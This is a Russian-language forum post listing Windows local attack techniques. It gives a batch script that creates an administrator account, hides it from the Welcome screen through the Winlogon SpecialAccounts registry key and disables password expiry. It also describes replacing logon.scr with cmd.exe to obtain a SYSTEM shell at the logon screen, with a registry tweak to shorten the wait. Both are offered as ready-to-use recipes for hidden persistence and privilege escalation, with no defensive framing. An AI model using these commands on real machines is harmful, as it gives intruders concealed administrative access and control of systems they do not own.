Ну давай сюда вариантов насыплем:

1) bat-файл:
net user ПОЛЬЗОВАТЕЛЬ ПАРОЛЬ /add
net localgroup Administrators ПОЛЬЗОВАТЕЛЬ /add
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t" /v ПОЛЬЗОВАТЕЛЬ /t reg_dword /d 00000000
net accounts /maxpwage:unlimited

Преимущества: получаем нового пользователя с админ-провами, который не виден в welcome-sreen. Требования, как и у ТС: админские права. При русской винде Administrators меняем на Администраторы

2) Имеем ограниченную запись и доступ на запись в %WinRoot%:
а) подменяем стартующую заставку logon.scr на нужную прогу: cmd.exe, totalcmd.exe etc.
б) перегружаемся, ждем 15 минут, получаем доступ от пользователя System (мышкой не двигаем, клавой не стучим, в систему не входим астрально)

пункт б) можно оптимизировать, если есть права на запись в реестр, просто поменяв таймаут: regedit и поиск logon.scr, дальше можно и самому разобраться.

P.S. Ребят, если есть физический доступ к компу, то "взлом" тривиален. Конечно, шифрование - это интересно, но это уже совсем другая история.

P.P.S. ТС, я понял, почему ряд форумчан воспринимал мои "очерки" как ... подбираю слово... неинтересные (как на защите: "а в чем новизна?"). Но, как говорится, "путешествие в сто миль начинается с первого шага" (с).

Чего-то много разговариваю, разогнался на 400 мл.